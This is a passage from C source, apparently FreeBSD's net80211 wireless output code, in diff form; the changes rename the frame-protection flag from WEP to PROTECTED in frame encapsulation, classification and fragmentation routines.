(%s)", __func__); - wh->i_fc[1] |= IEEE80211_FC1_WEP; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED; } m->m_flags |= M_ENCAP; /* mark encapsulated */ KASSERT(type != IEEE80211_FC0_SUBTYPE_PROBE_RESP, ("probe response?")); M_WME_SETAC(m, params->ibp_pri); #ifdef IEEE80211_DEBUG /* avoid printing too many frames */ if ((ieee80211_msg_debug(vap) && doprint(vap, type)) || ieee80211_msg_dumppkts(vap)) { printf("[%s] send %s on channel %u\n", ether_sprintf(wh->i_addr1), ieee80211_mgt_subtype_name[ (type & IEEE80211_FC0_SUBTYPE_MASK) >> IEEE80211_FC0_SUBTYPE_SHIFT], ieee80211_chan2ieee(ic, ic->ic_curchan)); } #endif IEEE80211_NODE_STAT(ni, tx_mgmt); ret = ieee80211_raw_output(vap, ni, m, params); IEEE80211_TX_UNLOCK(ic); return (ret); } /* * Send a null data frame to the specified node. If the station * is setup for QoS then a QoS Null Data frame is constructed. * If this is a WDS station then a 4-address frame is constructed. * * NB: the caller is assumed to have setup a node reference * for use; this is necessary to deal with a race condition * when probing for inactive stations. Like ieee80211_mgmt_output * we must cleanup any node reference on error; however we * can safely just unref it as we know it will never be the * last reference to the node. 
*/ int ieee80211_send_nulldata(struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct mbuf *m; struct ieee80211_frame *wh; int hdrlen; uint8_t *frm; int ret; if (vap->iv_state == IEEE80211_S_CAC) { IEEE80211_NOTE(vap, IEEE80211_MSG_OUTPUT | IEEE80211_MSG_DOTH, ni, "block %s frame in CAC state", "null data"); ieee80211_unref_node(&ni); vap->iv_stats.is_tx_badstate++; return EIO; /* XXX */ } if (ni->ni_flags & (IEEE80211_NODE_QOS|IEEE80211_NODE_HT)) hdrlen = sizeof(struct ieee80211_qosframe); else hdrlen = sizeof(struct ieee80211_frame); /* NB: only WDS vap's get 4-address frames */ if (vap->iv_opmode == IEEE80211_M_WDS) hdrlen += IEEE80211_ADDR_LEN; if (ic->ic_flags & IEEE80211_F_DATAPAD) hdrlen = roundup(hdrlen, sizeof(uint32_t)); m = ieee80211_getmgtframe(&frm, ic->ic_headroom + hdrlen, 0); if (m == NULL) { /* XXX debug msg */ ieee80211_unref_node(&ni); vap->iv_stats.is_tx_nobuf++; return ENOMEM; } KASSERT(M_LEADINGSPACE(m) >= hdrlen, ("leading space %zd", M_LEADINGSPACE(m))); M_PREPEND(m, hdrlen, M_NOWAIT); if (m == NULL) { /* NB: cannot happen */ ieee80211_free_node(ni); return ENOMEM; } IEEE80211_TX_LOCK(ic); wh = mtod(m, struct ieee80211_frame *); /* NB: a little lie */ if (ni->ni_flags & IEEE80211_NODE_QOS) { const int tid = WME_AC_TO_TID(WME_AC_BE); uint8_t *qos; ieee80211_send_setup(ni, m, IEEE80211_FC0_TYPE_DATA | IEEE80211_FC0_SUBTYPE_QOS_NULL, tid, vap->iv_myaddr, ni->ni_macaddr, ni->ni_bssid); if (vap->iv_opmode == IEEE80211_M_WDS) qos = ((struct ieee80211_qosframe_addr4 *) wh)->i_qos; else qos = ((struct ieee80211_qosframe *) wh)->i_qos; qos[0] = tid & IEEE80211_QOS_TID; if (ic->ic_wme.wme_wmeChanParams.cap_wmeParams[WME_AC_BE].wmep_noackPolicy) qos[0] |= IEEE80211_QOS_ACKPOLICY_NOACK; qos[1] = 0; } else { ieee80211_send_setup(ni, m, IEEE80211_FC0_TYPE_DATA | IEEE80211_FC0_SUBTYPE_NODATA, IEEE80211_NONQOS_TID, vap->iv_myaddr, ni->ni_macaddr, ni->ni_bssid); } if (vap->iv_opmode != IEEE80211_M_WDS) { /* NB: power management bit is never sent by an AP */ if ((ni->ni_flags & IEEE80211_NODE_PWR_MGT) && vap->iv_opmode != IEEE80211_M_HOSTAP) wh->i_fc[1] |= IEEE80211_FC1_PWR_MGT; } m->m_len = m->m_pkthdr.len = hdrlen; m->m_flags |= M_ENCAP; /* mark encapsulated */ M_WME_SETAC(m, WME_AC_BE); IEEE80211_NODE_STAT(ni, tx_data); IEEE80211_NOTE(vap, IEEE80211_MSG_DEBUG | IEEE80211_MSG_DUMPPKTS, ni, "send %snull data frame on channel %u, pwr mgt %s", ni->ni_flags & IEEE80211_NODE_QOS ? "QoS " : "", ieee80211_chan2ieee(ic, ic->ic_curchan), wh->i_fc[1] & IEEE80211_FC1_PWR_MGT ? "ena" : "dis"); ret = ieee80211_raw_output(vap, ni, m, NULL); IEEE80211_TX_UNLOCK(ic); return (ret); } /* * Assign priority to a frame based on any vlan tag assigned * to the station and/or any Diffserv setting in an IP header. * Finally, if an ACM policy is setup (in station mode) it's * applied. */ int ieee80211_classify(struct ieee80211_node *ni, struct mbuf *m) { const struct ether_header *eh = mtod(m, struct ether_header *); int v_wme_ac, d_wme_ac, ac; /* * Always promote PAE/EAPOL frames to high priority. */ if (eh->ether_type == htons(ETHERTYPE_PAE)) { /* NB: mark so others don't need to check header */ m->m_flags |= M_EAPOL; ac = WME_AC_VO; goto done; } /* * Non-qos traffic goes to BE. */ if ((ni->ni_flags & IEEE80211_NODE_QOS) == 0) { ac = WME_AC_BE; goto done; } /* * If node has a vlan tag then all traffic * to it must have a matching tag. 
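 * (Editorial addition.) The tag's 802.1p priority is mapped to an
 * access category with TID_TO_WME_AC(); further down the top three
 * bits of the IP TOS / IPv6 traffic class byte are mapped the same
 * way and the higher of the two categories wins.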
*/ v_wme_ac = 0; if (ni->ni_vlan != 0) { if ((m->m_flags & M_VLANTAG) == 0) { IEEE80211_NODE_STAT(ni, tx_novlantag); return 1; } if (EVL_VLANOFTAG(m->m_pkthdr.ether_vtag) != EVL_VLANOFTAG(ni->ni_vlan)) { IEEE80211_NODE_STAT(ni, tx_vlanmismatch); return 1; } /* map vlan priority to AC */ v_wme_ac = TID_TO_WME_AC(EVL_PRIOFTAG(ni->ni_vlan)); } /* XXX m_copydata may be too slow for fast path */ #ifdef INET if (eh->ether_type == htons(ETHERTYPE_IP)) { uint8_t tos; /* * IP frame, map the DSCP bits from the TOS field. */ /* NB: ip header may not be in first mbuf */ m_copydata(m, sizeof(struct ether_header) + offsetof(struct ip, ip_tos), sizeof(tos), &tos); tos >>= 5; /* NB: ECN + low 3 bits of DSCP */ d_wme_ac = TID_TO_WME_AC(tos); } else { #endif /* INET */ #ifdef INET6 if (eh->ether_type == htons(ETHERTYPE_IPV6)) { uint32_t flow; uint8_t tos; /* * IPv6 frame, map the DSCP bits from the traffic class field. */ m_copydata(m, sizeof(struct ether_header) + offsetof(struct ip6_hdr, ip6_flow), sizeof(flow), (caddr_t) &flow); tos = (uint8_t)(ntohl(flow) >> 20); tos >>= 5; /* NB: ECN + low 3 bits of DSCP */ d_wme_ac = TID_TO_WME_AC(tos); } else { #endif /* INET6 */ d_wme_ac = WME_AC_BE; #ifdef INET6 } #endif #ifdef INET } #endif /* * Use highest priority AC. */ if (v_wme_ac > d_wme_ac) ac = v_wme_ac; else ac = d_wme_ac; /* * Apply ACM policy. */ if (ni->ni_vap->iv_opmode == IEEE80211_M_STA) { static const int acmap[4] = { WME_AC_BK, /* WME_AC_BE */ WME_AC_BK, /* WME_AC_BK */ WME_AC_BE, /* WME_AC_VI */ WME_AC_VI, /* WME_AC_VO */ }; struct ieee80211com *ic = ni->ni_ic; while (ac != WME_AC_BK && ic->ic_wme.wme_wmeBssChanParams.cap_wmeParams[ac].wmep_acm) ac = acmap[ac]; } done: M_WME_SETAC(m, ac); return 0; } /* * Insure there is sufficient contiguous space to encapsulate the * 802.11 data frame. If room isn't already there, arrange for it. * Drivers and cipher modules assume we have done the necessary work * and fail rudely if they don't find the space they need. */ struct mbuf * ieee80211_mbuf_adjust(struct ieee80211vap *vap, int hdrsize, struct ieee80211_key *key, struct mbuf *m) { #define TO_BE_RECLAIMED (sizeof(struct ether_header) - sizeof(struct llc)) int needed_space = vap->iv_ic->ic_headroom + hdrsize; if (key != NULL) { /* XXX belongs in crypto code? */ needed_space += key->wk_cipher->ic_header; /* XXX frags */ /* * When crypto is being done in the host we must insure * the data are writable for the cipher routines; clone * a writable mbuf chain. * XXX handle SWMIC specially */ if (key->wk_flags & (IEEE80211_KEY_SWENCRYPT|IEEE80211_KEY_SWENMIC)) { m = m_unshare(m, M_NOWAIT); if (m == NULL) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_OUTPUT, "%s: cannot get writable mbuf\n", __func__); vap->iv_stats.is_tx_nobuf++; /* XXX new stat */ return NULL; } } } /* * We know we are called just before stripping an Ethernet * header and prepending an LLC header. This means we know * there will be * sizeof(struct ether_header) - sizeof(struct llc) * bytes recovered to which we need additional space for the * 802.11 header and any crypto header. */ /* XXX check trailing space and copy instead? 
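 * Editorial note: needed_space counts driver headroom plus the 802.11
 * and cipher headers, while TO_BE_RECLAIMED is what stripping the
 * Ethernet header (minus the LLC that replaces it) will give back, so
 * only the difference must be available as leading space here.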
*/ if (M_LEADINGSPACE(m) < needed_space - TO_BE_RECLAIMED) { struct mbuf *n = m_gethdr(M_NOWAIT, m->m_type); if (n == NULL) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_OUTPUT, "%s: cannot expand storage\n", __func__); vap->iv_stats.is_tx_nobuf++; m_freem(m); return NULL; } KASSERT(needed_space <= MHLEN, ("not enough room, need %u got %d\n", needed_space, MHLEN)); /* * Setup new mbuf to have leading space to prepend the * 802.11 header and any crypto header bits that are * required (the latter are added when the driver calls * back to ieee80211_crypto_encap to do crypto encapsulation). */ /* NB: must be first 'cuz it clobbers m_data */ m_move_pkthdr(n, m); n->m_len = 0; /* NB: m_gethdr does not set */ n->m_data += needed_space; /* * Pull up Ethernet header to create the expected layout. * We could use m_pullup but that's overkill (i.e. we don't * need the actual data) and it cannot fail so do it inline * for speed. */ /* NB: struct ether_header is known to be contiguous */ n->m_len += sizeof(struct ether_header); m->m_len -= sizeof(struct ether_header); m->m_data += sizeof(struct ether_header); /* * Replace the head of the chain. */ n->m_next = m; m = n; } return m; #undef TO_BE_RECLAIMED } /* * Return the transmit key to use in sending a unicast frame. * If a unicast key is set we use that. When no unicast key is set * we fall back to the default transmit key. */ static __inline struct ieee80211_key * ieee80211_crypto_getucastkey(struct ieee80211vap *vap, struct ieee80211_node *ni) { if (IEEE80211_KEY_UNDEFINED(&ni->ni_ucastkey)) { if (vap->iv_def_txkey == IEEE80211_KEYIX_NONE || IEEE80211_KEY_UNDEFINED(&vap->iv_nw_keys[vap->iv_def_txkey])) return NULL; return &vap->iv_nw_keys[vap->iv_def_txkey]; } else { return &ni->ni_ucastkey; } } /* * Return the transmit key to use in sending a multicast frame. * Multicast traffic always uses the group key which is installed as * the default tx key. */ static __inline struct ieee80211_key * ieee80211_crypto_getmcastkey(struct ieee80211vap *vap, struct ieee80211_node *ni) { if (vap->iv_def_txkey == IEEE80211_KEYIX_NONE || IEEE80211_KEY_UNDEFINED(&vap->iv_nw_keys[vap->iv_def_txkey])) return NULL; return &vap->iv_nw_keys[vap->iv_def_txkey]; } /* * Encapsulate an outbound data frame. The mbuf chain is updated. * If an error is encountered NULL is returned. The caller is required * to provide a node reference and pullup the ethernet header in the * first mbuf. * * NB: Packet is assumed to be processed by ieee80211_classify which * marked EAPOL frames w/ M_EAPOL. */ struct mbuf * ieee80211_encap(struct ieee80211vap *vap, struct ieee80211_node *ni, struct mbuf *m) { #define WH4(wh) ((struct ieee80211_frame_addr4 *)(wh)) #define MC01(mc) ((struct ieee80211_meshcntl_ae01 *)mc) struct ieee80211com *ic = ni->ni_ic; #ifdef IEEE80211_SUPPORT_MESH struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_meshcntl_ae10 *mc; struct ieee80211_mesh_route *rt = NULL; int dir = -1; #endif struct ether_header eh; struct ieee80211_frame *wh; struct ieee80211_key *key; struct llc *llc; int hdrsize, hdrspace, datalen, addqos, txfrag, is4addr; ieee80211_seq seqno; int meshhdrsize, meshae; uint8_t *qos; IEEE80211_TX_LOCK_ASSERT(ic); /* * Copy existing Ethernet header to a safe place. The * rest of the code assumes it's ok to strip it when * reorganizing state for the final encapsulation. */ KASSERT(m->m_len >= sizeof(eh), ("no ethernet header!")); ETHER_HEADER_COPY(&eh, mtod(m, caddr_t)); /* * Insure space for additional headers. 
First identify * transmit key to use in calculating any buffer adjustments * required. This is also used below to do privacy * encapsulation work. Then calculate the 802.11 header * size and any padding required by the driver. * * Note key may be NULL if we fall back to the default * transmit key and that is not set. In that case the * buffer may not be expanded as needed by the cipher * routines, but they will/should discard it. */ if (vap->iv_flags & IEEE80211_F_PRIVACY) { if (vap->iv_opmode == IEEE80211_M_STA || !IEEE80211_IS_MULTICAST(eh.ether_dhost) || (vap->iv_opmode == IEEE80211_M_WDS && (vap->iv_flags_ext & IEEE80211_FEXT_WDSLEGACY))) key = ieee80211_crypto_getucastkey(vap, ni); else key = ieee80211_crypto_getmcastkey(vap, ni); if (key == NULL && (m->m_flags & M_EAPOL) == 0) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_CRYPTO, eh.ether_dhost, "no default transmit key (%s) deftxkey %u", __func__, vap->iv_def_txkey); vap->iv_stats.is_tx_nodefkey++; goto bad; } } else key = NULL; /* * XXX Some ap's don't handle QoS-encapsulated EAPOL * frames so suppress use. This may be an issue if other * ap's require all data frames to be QoS-encapsulated * once negotiated in which case we'll need to make this * configurable. * NB: mesh data frames are QoS. */ addqos = ((ni->ni_flags & (IEEE80211_NODE_QOS|IEEE80211_NODE_HT)) || (vap->iv_opmode == IEEE80211_M_MBSS)) && (m->m_flags & M_EAPOL) == 0; if (addqos) hdrsize = sizeof(struct ieee80211_qosframe); else hdrsize = sizeof(struct ieee80211_frame); #ifdef IEEE80211_SUPPORT_MESH if (vap->iv_opmode == IEEE80211_M_MBSS) { /* * Mesh data frames are encapsulated according to the * rules of Section 11B.8.5 (p.139 of D3.0 spec). * o Group Addressed data (aka multicast) originating * at the local sta are sent w/ 3-address format and * address extension mode 00 * o Individually Addressed data (aka unicast) originating * at the local sta are sent w/ 4-address format and * address extension mode 00 * o Group Addressed data forwarded from a non-mesh sta are * sent w/ 3-address format and address extension mode 01 * o Individually Address data from another sta are sent * w/ 4-address format and address extension mode 10 */ is4addr = 0; /* NB: don't use, disable */ if (!IEEE80211_IS_MULTICAST(eh.ether_dhost)) { rt = ieee80211_mesh_rt_find(vap, eh.ether_dhost); KASSERT(rt != NULL, ("route is NULL")); dir = IEEE80211_FC1_DIR_DSTODS; hdrsize += IEEE80211_ADDR_LEN; if (rt->rt_flags & IEEE80211_MESHRT_FLAGS_PROXY) { if (IEEE80211_ADDR_EQ(rt->rt_mesh_gate, vap->iv_myaddr)) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, eh.ether_dhost, "%s", "trying to send to ourself"); goto bad; } meshae = IEEE80211_MESH_AE_10; meshhdrsize = sizeof(struct ieee80211_meshcntl_ae10); } else { meshae = IEEE80211_MESH_AE_00; meshhdrsize = sizeof(struct ieee80211_meshcntl); } } else { dir = IEEE80211_FC1_DIR_FROMDS; if (!IEEE80211_ADDR_EQ(eh.ether_shost, vap->iv_myaddr)) { /* proxy group */ meshae = IEEE80211_MESH_AE_01; meshhdrsize = sizeof(struct ieee80211_meshcntl_ae01); } else { /* group */ meshae = IEEE80211_MESH_AE_00; meshhdrsize = sizeof(struct ieee80211_meshcntl); } } } else { #endif /* * 4-address frames need to be generated for: * o packets sent through a WDS vap (IEEE80211_M_WDS) * o packets sent through a vap marked for relaying * (e.g. 
a station operating with dynamic WDS) */ is4addr = vap->iv_opmode == IEEE80211_M_WDS || ((vap->iv_flags_ext & IEEE80211_FEXT_4ADDR) && !IEEE80211_ADDR_EQ(eh.ether_shost, vap->iv_myaddr)); if (is4addr) hdrsize += IEEE80211_ADDR_LEN; meshhdrsize = meshae = 0; #ifdef IEEE80211_SUPPORT_MESH } #endif /* * Honor driver DATAPAD requirement. */ if (ic->ic_flags & IEEE80211_F_DATAPAD) hdrspace = roundup(hdrsize, sizeof(uint32_t)); else hdrspace = hdrsize; if (__predict_true((m->m_flags & M_FF) == 0)) { /* * Normal frame. */ m = ieee80211_mbuf_adjust(vap, hdrspace + meshhdrsize, key, m); if (m == NULL) { /* NB: ieee80211_mbuf_adjust handles msgs+statistics */ goto bad; } /* NB: this could be optimized 'cuz of ieee80211_mbuf_adjust */ m_adj(m, sizeof(struct ether_header) - sizeof(struct llc)); llc = mtod(m, struct llc *); llc->llc_dsap = llc->llc_ssap = LLC_SNAP_LSAP; llc->llc_control = LLC_UI; llc->llc_snap.org_code[0] = 0; llc->llc_snap.org_code[1] = 0; llc->llc_snap.org_code[2] = 0; llc->llc_snap.ether_type = eh.ether_type; } else { #ifdef IEEE80211_SUPPORT_SUPERG /* * Aggregated frame. */ m = ieee80211_ff_encap(vap, m, hdrspace + meshhdrsize, key); if (m == NULL) #endif goto bad; } datalen = m->m_pkthdr.len; /* NB: w/o 802.11 header */ M_PREPEND(m, hdrspace + meshhdrsize, M_NOWAIT); if (m == NULL) { vap->iv_stats.is_tx_nobuf++; goto bad; } wh = mtod(m, struct ieee80211_frame *); wh->i_fc[0] = IEEE80211_FC0_VERSION_0 | IEEE80211_FC0_TYPE_DATA; *(uint16_t *)wh->i_dur = 0; qos = NULL; /* NB: quiet compiler */ if (is4addr) { wh->i_fc[1] = IEEE80211_FC1_DIR_DSTODS; IEEE80211_ADDR_COPY(wh->i_addr1, ni->ni_macaddr); IEEE80211_ADDR_COPY(wh->i_addr2, vap->iv_myaddr); IEEE80211_ADDR_COPY(wh->i_addr3, eh.ether_dhost); IEEE80211_ADDR_COPY(WH4(wh)->i_addr4, eh.ether_shost); } else switch (vap->iv_opmode) { case IEEE80211_M_STA: wh->i_fc[1] = IEEE80211_FC1_DIR_TODS; IEEE80211_ADDR_COPY(wh->i_addr1, ni->ni_bssid); IEEE80211_ADDR_COPY(wh->i_addr2, eh.ether_shost); IEEE80211_ADDR_COPY(wh->i_addr3, eh.ether_dhost); break; case IEEE80211_M_IBSS: case IEEE80211_M_AHDEMO: wh->i_fc[1] = IEEE80211_FC1_DIR_NODS; IEEE80211_ADDR_COPY(wh->i_addr1, eh.ether_dhost); IEEE80211_ADDR_COPY(wh->i_addr2, eh.ether_shost); /* * NB: always use the bssid from iv_bss as the * neighbor's may be stale after an ibss merge */ IEEE80211_ADDR_COPY(wh->i_addr3, vap->iv_bss->ni_bssid); break; case IEEE80211_M_HOSTAP: wh->i_fc[1] = IEEE80211_FC1_DIR_FROMDS; IEEE80211_ADDR_COPY(wh->i_addr1, eh.ether_dhost); IEEE80211_ADDR_COPY(wh->i_addr2, ni->ni_bssid); IEEE80211_ADDR_COPY(wh->i_addr3, eh.ether_shost); break; #ifdef IEEE80211_SUPPORT_MESH case IEEE80211_M_MBSS: /* NB: offset by hdrspace to deal with DATAPAD */ mc = (struct ieee80211_meshcntl_ae10 *) (mtod(m, uint8_t *) + hdrspace); wh->i_fc[1] = dir; switch (meshae) { case IEEE80211_MESH_AE_00: /* no proxy */ mc->mc_flags = 0; if (dir == IEEE80211_FC1_DIR_DSTODS) { /* ucast */ IEEE80211_ADDR_COPY(wh->i_addr1, ni->ni_macaddr); IEEE80211_ADDR_COPY(wh->i_addr2, vap->iv_myaddr); IEEE80211_ADDR_COPY(wh->i_addr3, eh.ether_dhost); IEEE80211_ADDR_COPY(WH4(wh)->i_addr4, eh.ether_shost); qos =((struct ieee80211_qosframe_addr4 *) wh)->i_qos; } else if (dir == IEEE80211_FC1_DIR_FROMDS) { /* mcast */ IEEE80211_ADDR_COPY(wh->i_addr1, eh.ether_dhost); IEEE80211_ADDR_COPY(wh->i_addr2, vap->iv_myaddr); IEEE80211_ADDR_COPY(wh->i_addr3, eh.ether_shost); qos = ((struct ieee80211_qosframe *) wh)->i_qos; } break; case IEEE80211_MESH_AE_01: /* mcast, proxy */ wh->i_fc[1] = IEEE80211_FC1_DIR_FROMDS; 
IEEE80211_ADDR_COPY(wh->i_addr1, eh.ether_dhost); IEEE80211_ADDR_COPY(wh->i_addr2, vap->iv_myaddr); IEEE80211_ADDR_COPY(wh->i_addr3, vap->iv_myaddr); mc->mc_flags = 1; IEEE80211_ADDR_COPY(MC01(mc)->mc_addr4, eh.ether_shost); qos = ((struct ieee80211_qosframe *) wh)->i_qos; break; case IEEE80211_MESH_AE_10: /* ucast, proxy */ KASSERT(rt != NULL, ("route is NULL")); IEEE80211_ADDR_COPY(wh->i_addr1, rt->rt_nexthop); IEEE80211_ADDR_COPY(wh->i_addr2, vap->iv_myaddr); IEEE80211_ADDR_COPY(wh->i_addr3, rt->rt_mesh_gate); IEEE80211_ADDR_COPY(WH4(wh)->i_addr4, vap->iv_myaddr); mc->mc_flags = IEEE80211_MESH_AE_10; IEEE80211_ADDR_COPY(mc->mc_addr5, eh.ether_dhost); IEEE80211_ADDR_COPY(mc->mc_addr6, eh.ether_shost); qos = ((struct ieee80211_qosframe_addr4 *) wh)->i_qos; break; default: KASSERT(0, ("meshae %d", meshae)); break; } mc->mc_ttl = ms->ms_ttl; ms->ms_seq++; LE_WRITE_4(mc->mc_seq, ms->ms_seq); break; #endif case IEEE80211_M_WDS: /* NB: is4addr should always be true */ default: goto bad; } if (m->m_flags & M_MORE_DATA) wh->i_fc[1] |= IEEE80211_FC1_MORE_DATA; if (addqos) { int ac, tid; if (is4addr) { qos = ((struct ieee80211_qosframe_addr4 *) wh)->i_qos; /* NB: mesh case handled earlier */ } else if (vap->iv_opmode != IEEE80211_M_MBSS) qos = ((struct ieee80211_qosframe *) wh)->i_qos; ac = M_WME_GETAC(m); /* map from access class/queue to 11e header priorty value */ tid = WME_AC_TO_TID(ac); qos[0] = tid & IEEE80211_QOS_TID; if (ic->ic_wme.wme_wmeChanParams.cap_wmeParams[ac].wmep_noackPolicy) qos[0] |= IEEE80211_QOS_ACKPOLICY_NOACK; #ifdef IEEE80211_SUPPORT_MESH if (vap->iv_opmode == IEEE80211_M_MBSS) qos[1] = IEEE80211_QOS_MC; else #endif qos[1] = 0; wh->i_fc[0] |= IEEE80211_FC0_SUBTYPE_QOS; if ((m->m_flags & M_AMPDU_MPDU) == 0) { /* * NB: don't assign a sequence # to potential * aggregates; we expect this happens at the * point the frame comes off any aggregation q * as otherwise we may introduce holes in the * BA sequence space and/or make window accouting * more difficult. * * XXX may want to control this with a driver * capability; this may also change when we pull * aggregation up into net80211 */ seqno = ni->ni_txseqs[tid]++; *(uint16_t *)wh->i_seq = htole16(seqno << IEEE80211_SEQ_SEQ_SHIFT); M_SEQNO_SET(m, seqno); } } else { seqno = ni->ni_txseqs[IEEE80211_NONQOS_TID]++; *(uint16_t *)wh->i_seq = htole16(seqno << IEEE80211_SEQ_SEQ_SHIFT); M_SEQNO_SET(m, seqno); } /* check if xmit fragmentation is required */ txfrag = (m->m_pkthdr.len > vap->iv_fragthreshold && !IEEE80211_IS_MULTICAST(wh->i_addr1) && (vap->iv_caps & IEEE80211_C_TXFRAG) && (m->m_flags & (M_FF | M_AMPDU_MPDU)) == 0); if (key != NULL) { /* * IEEE 802.1X: send EAPOL frames always in the clear. * WPA/WPA2: encrypt EAPOL keys when pairwise keys are set. */ if ((m->m_flags & M_EAPOL) == 0 || ((vap->iv_flags & IEEE80211_F_WPA) && (vap->iv_opmode == IEEE80211_M_STA ? !IEEE80211_KEY_UNDEFINED(key) : !IEEE80211_KEY_UNDEFINED(&ni->ni_ucastkey)))) { - wh->i_fc[1] |= IEEE80211_FC1_WEP; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED; if (!ieee80211_crypto_enmic(vap, key, m, txfrag)) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_OUTPUT, eh.ether_dhost, "%s", "enmic failed, discard frame"); vap->iv_stats.is_crypto_enmicfail++; goto bad; } } } if (txfrag && !ieee80211_fragment(vap, m, hdrsize, key != NULL ? 
key->wk_cipher->ic_header : 0, vap->iv_fragthreshold)) goto bad; m->m_flags |= M_ENCAP; /* mark encapsulated */ IEEE80211_NODE_STAT(ni, tx_data); if (IEEE80211_IS_MULTICAST(wh->i_addr1)) { IEEE80211_NODE_STAT(ni, tx_mcast); m->m_flags |= M_MCAST; } else IEEE80211_NODE_STAT(ni, tx_ucast); IEEE80211_NODE_STAT_ADD(ni, tx_bytes, datalen); return m; bad: if (m != NULL) m_freem(m); return NULL; #undef WH4 #undef MC01 } /* * Fragment the frame according to the specified mtu. * The size of the 802.11 header (w/o padding) is provided * so we don't need to recalculate it. We create a new * mbuf for each fragment and chain it through m_nextpkt; * we might be able to optimize this by reusing the original * packet's mbufs but that is significantly more complicated. */ static int ieee80211_fragment(struct ieee80211vap *vap, struct mbuf *m0, u_int hdrsize, u_int ciphdrsize, u_int mtu) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_frame *wh, *whf; struct mbuf *m, *prev, *next; u_int totalhdrsize, fragno, fragsize, off, remainder, payload; u_int hdrspace; KASSERT(m0->m_nextpkt == NULL, ("mbuf already chained?")); KASSERT(m0->m_pkthdr.len > mtu, ("pktlen %u mtu %u", m0->m_pkthdr.len, mtu)); /* * Honor driver DATAPAD requirement. */ if (ic->ic_flags & IEEE80211_F_DATAPAD) hdrspace = roundup(hdrsize, sizeof(uint32_t)); else hdrspace = hdrsize; wh = mtod(m0, struct ieee80211_frame *); /* NB: mark the first frag; it will be propagated below */ wh->i_fc[1] |= IEEE80211_FC1_MORE_FRAG; totalhdrsize = hdrspace + ciphdrsize; fragno = 1; off = mtu - ciphdrsize; remainder = m0->m_pkthdr.len - off; prev = m0; do { fragsize = totalhdrsize + remainder; if (fragsize > mtu) fragsize = mtu; /* XXX fragsize can be >2048! */ KASSERT(fragsize < MCLBYTES, ("fragment size %u too big!", fragsize)); if (fragsize > MHLEN) m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); else m = m_gethdr(M_NOWAIT, MT_DATA); if (m == NULL) goto bad; /* leave room to prepend any cipher header */ m_align(m, fragsize - ciphdrsize); /* * Form the header in the fragment. Note that since * we mark the first fragment with the MORE_FRAG bit * it automatically is propagated to each fragment; we * need only clear it on the last fragment (done below). * NB: frag 1+ dont have Mesh Control field present. 
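 *
 * A worked example with assumed numbers (24-byte header, no cipher
 * header, hypothetical 1000-byte threshold, 2200 bytes of payload,
 * i.e. m0->m_pkthdr.len == 2224):
 *
 *	off = 1000, remainder = 1224
 *	frag 1: fragsize = 1000, payload = 976  (remainder 248)
 *	frag 2: fragsize = 272,  payload = 248  (remainder 0)
 *
 * and m0 itself is later trimmed back to 1000 bytes, so the three
 * fragments carry 976 + 976 + 248 = 2200 payload bytes in total.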
*/ whf = mtod(m, struct ieee80211_frame *); memcpy(whf, wh, hdrsize); #ifdef IEEE80211_SUPPORT_MESH if (vap->iv_opmode == IEEE80211_M_MBSS) { if (IEEE80211_IS_DSTODS(wh)) ((struct ieee80211_qosframe_addr4 *) whf)->i_qos[1] &= ~IEEE80211_QOS_MC; else ((struct ieee80211_qosframe *) whf)->i_qos[1] &= ~IEEE80211_QOS_MC; } #endif *(uint16_t *)&whf->i_seq[0] |= htole16( (fragno & IEEE80211_SEQ_FRAG_MASK) << IEEE80211_SEQ_FRAG_SHIFT); fragno++; payload = fragsize - totalhdrsize; /* NB: destination is known to be contiguous */ m_copydata(m0, off, payload, mtod(m, uint8_t *) + hdrspace); m->m_len = hdrspace + payload; m->m_pkthdr.len = hdrspace + payload; m->m_flags |= M_FRAG; /* chain up the fragment */ prev->m_nextpkt = m; prev = m; /* deduct fragment just formed */ remainder -= payload; off += payload; } while (remainder != 0); /* set the last fragment */ m->m_flags |= M_LASTFRAG; whf->i_fc[1] &= ~IEEE80211_FC1_MORE_FRAG; /* strip first mbuf now that everything has been copied */ m_adj(m0, -(m0->m_pkthdr.len - (mtu - ciphdrsize))); m0->m_flags |= M_FIRSTFRAG | M_FRAG; vap->iv_stats.is_tx_fragframes++; vap->iv_stats.is_tx_frags += fragno-1; return 1; bad: /* reclaim fragments but leave original frame for caller to free */ for (m = m0->m_nextpkt; m != NULL; m = next) { next = m->m_nextpkt; m->m_nextpkt = NULL; /* XXX paranoid */ m_freem(m); } m0->m_nextpkt = NULL; return 0; } /* * Add a supported rates element id to a frame. */ uint8_t * ieee80211_add_rates(uint8_t *frm, const struct ieee80211_rateset *rs) { int nrates; *frm++ = IEEE80211_ELEMID_RATES; nrates = rs->rs_nrates; if (nrates > IEEE80211_RATE_SIZE) nrates = IEEE80211_RATE_SIZE; *frm++ = nrates; memcpy(frm, rs->rs_rates, nrates); return frm + nrates; } /* * Add an extended supported rates element id to a frame. */ uint8_t * ieee80211_add_xrates(uint8_t *frm, const struct ieee80211_rateset *rs) { /* * Add an extended supported rates element if operating in 11g mode. */ if (rs->rs_nrates > IEEE80211_RATE_SIZE) { int nrates = rs->rs_nrates - IEEE80211_RATE_SIZE; *frm++ = IEEE80211_ELEMID_XRATES; *frm++ = nrates; memcpy(frm, rs->rs_rates + IEEE80211_RATE_SIZE, nrates); frm += nrates; } return frm; } /* * Add an ssid element to a frame. */ static uint8_t * ieee80211_add_ssid(uint8_t *frm, const uint8_t *ssid, u_int len) { *frm++ = IEEE80211_ELEMID_SSID; *frm++ = len; memcpy(frm, ssid, len); return frm + len; } /* * Add an erp element to a frame. */ static uint8_t * ieee80211_add_erp(uint8_t *frm, struct ieee80211com *ic) { uint8_t erp; *frm++ = IEEE80211_ELEMID_ERP; *frm++ = 1; erp = 0; if (ic->ic_nonerpsta != 0) erp |= IEEE80211_ERP_NON_ERP_PRESENT; if (ic->ic_flags & IEEE80211_F_USEPROT) erp |= IEEE80211_ERP_USE_PROTECTION; if (ic->ic_flags & IEEE80211_F_USEBARKER) erp |= 